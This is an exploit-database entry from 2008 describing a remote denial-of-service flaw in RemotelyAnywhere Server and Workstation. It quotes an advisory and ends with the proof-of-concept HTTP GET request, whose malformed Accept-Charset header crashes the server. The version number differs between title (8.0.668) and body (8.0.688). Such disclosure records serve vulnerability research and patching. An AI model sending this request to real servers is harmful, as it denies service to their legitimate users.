RemotelyAnywhere 8.0.668 - Accept-Charset Null Pointer Denial of Service

2008-03-10T00:00:00
ID EXPLOITPACK:CACD5A1A46982DE05BB4E51EF7AED670
Type exploitpack
Reporter Luigi Auriemma
Modified 2008-03-10T00:00:00

Description

RemotelyAnywhere 8.0.668 - Accept-Charset Null Pointer Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/28175/info

RemotelyAnywhere is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.

Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users.

This issue affects RemotelyAnywhere Server and Workstation 8.0.688; other versions may also be affected.

GET / HTTP/1.1
Accept-Charset: boom